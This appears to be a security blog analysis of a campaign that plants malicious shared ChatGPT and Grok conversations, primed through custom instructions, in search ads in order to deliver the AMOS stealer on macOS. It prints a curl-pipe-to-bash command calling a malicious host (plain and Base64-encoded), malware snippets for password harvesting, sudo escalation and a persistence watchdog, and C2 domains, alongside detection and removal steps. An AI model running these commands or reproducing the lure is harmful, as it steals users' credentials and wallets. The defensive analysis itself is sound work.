Listen to this Post
Introduction:
A sophisticated new attack campaign is weaponizing user trust in AI assistants and search engines to deliver malware with frightening efficiency. By poisoning Google search results with malicious links to shared ChatGPT and DeepSeek conversations, threat actors trick users into executing terminal commands that silently deploy the Atomic macOS Stealer (AMOS), a potent infostealer. This method represents a fundamental shift in social engineering, bypassing traditional security warnings by masquerading entirely as legitimate help.
Learning Objectives:
- Understand the anatomy of the AI/SEO poisoning attack chain, from malicious ad to malware execution.
- Learn to identify the hallmarks of a poisoned AI conversation and a malicious terminal command.
- Acquire practical skills to detect, analyze, and mitigate this specific threat on macOS systems.
You Should Know:
- The Initial Infection: SEO Poisoning & Malicious AI Chats
The attack begins not with a phishing email, but with a Google search. Threat actors identify high-volume, benign troubleshooting queries like “how to clean disk space on macOS.” They then create public, shared conversations on platforms like ChatGPT and Grok, where the AI is manipulated via custom instructions to output malicious guidance. Finally, they use malvertising—purchasing sponsored search ads—to ensure these malicious chat links appear at the top of search results.
Step‑by‑step guide explaining what this does and how to use it.
1. Threat Actor Setup: An attacker creates an account on an AI chat platform (e.g., ChatGPT). They use “Custom Instructions” or similar feature to prime the AI to respond to a specific query with a malicious output.
2. Conversation Generation: The attacker asks the primed AI a question like “How to delete system data on Mac?” The AI generates a response containing a `curl` or `bash` command with an obfuscated, malicious URL.
3. Link Sharing: The attacker uses the platform’s “Share Chat” function to generate a public, legitimate-looking URL (e.g., chat.openai.com/share/...).
4. Traffic Acquisition: The attacker purchases Google Ads for the target keywords, pointing the ad directly to the shared chat URL. This places their malicious “help guide” above organic, trustworthy results.
5. Defense/Mitigation: Security teams should monitor for unusual domains in web gateways and consider tighter controls on access to AI chat platforms. For end-users, emphasize critical thinking: treat the first search result, especially if labeled “Ad,” with skepticism, even if it points to a known domain.
2. The Lure: Dissecting a Poisoned AI Conversation
The shared chat is the perfect lure. It exists on a trusted domain (chat.openai.com, grok.com), uses professional formatting with code blocks and emojis, and employs reassuring language (“safely removes,” “does not touch personal data”). The malicious command is embedded as the solution, often obfuscated with Base64 encoding to avoid immediate scrutiny by the user or platform filters.
Step‑by‑step guide explaining what this does and how to use it.
1. Visual Inspection: A poisoned chat will look authentic. Key indicators are its singular focus, lack of alternative options, and a command that uses `curl` or pipes to `bash` from an unfamiliar URL.
2. Command Analysis: The core malicious command typically follows this pattern:
Example from the campaign (decoded) curl -s https://malicious[.]com/cleangpt | bash
Or an obfuscated version:
Base64 encoded command found in the chats echo "Y3VybCAtcyBodHRwczovL21hbGljaW91c1suLWNvbS9jbGVhbmdwdCAK" | base64 -d | bash
3. Safe Decoding for Analysis: Never execute the command. You can decode it safely to reveal the target URL for blocklisting.
On Linux/macOS terminal echo "BASE64_STRING_HERE" | base64 -d This will output the plaintext command, revealing the malicious host.
4. Proactive Defense: Implement application allow-listing to prevent unauthorized execution of `bash` or `curl` from terminals. Use DNS filtering services to block known malicious domains identified in these decoded commands.
3. Stage 1: Credential Harvesting and Privilege Escalation
Once executed, the first-stage script (cleangpt) performs credential harvesting and privilege escalation. It prompts the user for their system password, validates it silently using macOS’s `dscl` command, stores it in plaintext, and then uses it to gain root permissions via sudo -S.
Step‑by‑step guide explaining what this does and how to use it.
1. Script Execution: The downloaded bash script runs and presents a fake “System Password” prompt in the terminal.
2. Password Validation & Storage:
Simplified snippet from the malware if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass Password stored in plaintext fi
3. Privilege Escalation: The script then uses the piped password to execute subsequent commands with root privileges, bypassing interactive `sudo` prompts.
cat /tmp/.pass | sudo -S xattr -c /tmp/update Remove quarantine attribute cat /tmp/.pass | sudo -S chmod +x /tmp/update Make binary executable
4. Detection & Mitigation:
Monitor for processes: Look for `dscl` commands with the `-authonly` flag originating from terminal or bash scripts.
File Integrity Monitoring (FIM): Alert on creation of files like `/tmp/.pass` or /tmp/update.
Command-Line Auditing: Use tools like `auditd` (Linux) or `osquery` (cross-platform) to log use of sudo -S.
4. Stage 2: Payload Deployment and Data Theft
The `update` binary is the main AMOS stealer payload. It is ad-hoc signed, copied to a hidden location (~/.helper), and begins systematic data exfiltration. It targets browser data (cookies, passwords), cryptocurrency wallets (Ledger Live, Trezor Suite, browser extensions), macOS keychains, and files from Documents and Desktop folders.
Step‑by‑step guide explaining what this does and how to use it.
1. Payload Installation: The binary installs itself persistently and may attempt to trojanize existing cryptocurrency wallet apps by replacing them with malicious copies.
2. Data Collection Paths: The malware scans for and exfiltrates data from specific, predictable paths:
Example paths targeted (to check on a suspect system) ~/Library/Application Support/Google/Chrome/Default/Cookies ~/Library/Application Support/Ledger Live/ ~/Library/Keychains/login.keychain-db ~/Desktop/ ~/Documents/
3. Detection Commands:
Check for the hidden helper binary ls -la ~/.helper Check for suspicious LaunchDaemons ls -la /Library/LaunchDaemons/ | grep -i helper Check for unknown ad-hoc signed applications codesign -dv --verbose=4 /path/to/suspicious/binary 2>&1 | grep -A 5 "Authority"
4. Mitigation: Regular endpoint detection scans should include these user-writable, persistent locations and flag unexpected ad-hoc signed binaries.
5. Stage 3: Persistence via LaunchDaemons and Watchdogs
To survive reboots, the malware installs a LaunchDaemon that runs a watchdog script (~/.agent). This script continuously checks for an active user session and ensures the main stealer binary (~/.helper) is always running in that user’s context, guaranteeing persistent access to GUI-level data.
Step‑by‑step guide explaining what this does and how to use it.
1. Persistence Mechanism: A LaunchDaemon plist (/Library/LaunchDaemons/com.finder.helper.plist) is created to call the watchdog script on boot.
2. Watchdog Script Logic: The `.agent` script runs a loop:
while true; do user=$(stat -f "%Su" /dev/console) if [ "$user" != "root" ] && [ "$user" != "" ]; then sudo -u "$user" ~/.helper Relaunch stealer as logged-in user fi sleep 1 done
3. Removal Guide:
Disable and remove the LaunchDaemon:
sudo launchctl unload -w /Library/LaunchDaemons/com.finder.helper.plist sudo rm /Library/LaunchDaemons/com.finder.helper.plist
Kill the processes and delete the files:
sudo pkill -f ".helper" sudo pkill -f ".agent" rm -f ~/.helper ~/.agent
Crucially: Change all user and administrator passwords, as they have been compromised.
- API Security and Cloud Hardening for AI Platforms
This attack vector exploits the “Share Chat” API feature of AI platforms. While the content is user-generated, the platform’s reputation and domain are leveraged. This creates a new “malware-as-a-service” vector where attackers can host malicious content on trusted infrastructure.
Step‑by‑step guide explaining what this does and how to use it.
1. The Vulnerability: The ability to generate and share persistent, public links to unmoderated AI conversations that can contain code.
2. Platform Defender Recommendations:
Input/Output Scanning: Implement post-generation scanning of shared chats for patterns like Base64-encoded `curl|bash` commands, known malicious URLs, or excessive obfuscation.
Rate Limiting & Attribution: Limit the creation of shared links from new accounts and maintain robust audit logs for abuse investigations.
User Reporting & Takedown: Streamline the process for users to report malicious shared chats for rapid takedown.
3. Enterprise Security Controls:
Web Filtering: Categorize and potentially restrict access to AI chat platforms’ “shared chat” subdomains in corporate environments.
DNS Security: Use DNS filtering to block the final-stage C2 domains (e.g., nonnida[.]com, putuartana[.]com) at the network level.
7. Proactive Hunting and Mitigation Strategies
Defending against this evolving threat requires a shift from solely technical controls to a combination of user education, process hardening, and proactive hunting.
Step‑by‑step guide explaining what this does and how to use it.
1. User Training: Conduct focused training on this specific lure. Teach users to:
Be wary of single-solution commands from AI chats.
Never copy-paste `curl | bash` or `wget | bash` style commands from untrusted sources.
Verify instructions through multiple official sources.
2. Endpoint Hardening:
macOS Specific: Consider stricter Gatekeeper settings and using Privacy & Security preferences to limit terminal’s ability to run unsigned scripts.
Universal: Implement application allow-listing. If possible, restrict the `sudo -S` flag to prevent password pipelining for non-admin users.
3. Hunting Queries:
SIEM/EDR Search: Hunt for processes where the parent is `bash` or `zsh` and the command line contains both `dscl . -authonly` and a pipe (|) to sudo -S.
File System Hunt: Search for files named .pass, update, .helper, or `.agent` in `/tmp` or user home directories.
Example hunt command on a macOS endpoint sudo find / -type f ( -name ".pass" -o -name ".helper" -o -name ".agent" ) 2>/dev/null
What Undercode Say:
Key Takeaway 1: The attack’s brilliance lies in its simplicity and abuse of inherent trust. It requires zero exploits, bypasses no traditional security pop-ups, and leverages platforms’ own features (Share Chat, Ads) against their users. The entire infection chain—search, click, copy-paste—is indistinguishable from normal, helpful behavior.
Key Takeaway 2: This marks the mainstream arrival of “AI Poisoning” as a distinct social engineering vector. The barrier to entry is lowered; attackers no longer need to build fake websites or craft convincing emails. They can now use powerful, trusted AI interfaces to generate and host their lures, making the malicious content more credible and harder for defenders to blacklist.
Analysis:
This campaign is a watershed moment, signaling the convergence of AI democratization, malvertising, and classic social engineering. It exposes a critical weakness in our trust model for digital ecosystems: we trust the platform (Google, OpenAI), so we trust the content it surfaces. Defenders can no longer rely on network perimeter controls or malicious file detection alone. The focus must expand to include behavioral analysis of command-line activity (especially sudo -S), rigorous monitoring of persistence mechanisms, and, most challengingly, changing user behavior towards a “trust but verify” stance even with content from reputable sources. The technical payload (AMOS) is well-understood; the delivery mechanism is the innovation, and it is highly replicable for other platforms and operating systems.
Prediction:
This “AI Poisoning” technique will rapidly evolve and expand. We will see it target other platforms with share features (e.g., Microsoft Copilot, Claude) and pivot to other operating systems, notably Linux where `curl | bash` installations are common. The lures will also diversify beyond tech support to current events (e.g., “How to claim government relief funds”), leveraging AI to generate highly topical and convincing traps. Furthermore, the model could be adapted for disinformation campaigns, using poisoned AI chats to spread convincing false instructions at scale. Defensively, this will pressure AI platforms to implement more robust real-time content safety checks on shared outputs, potentially leading to a new category of security solutions focused on AI-generated content verification.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Thomas Roccia – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
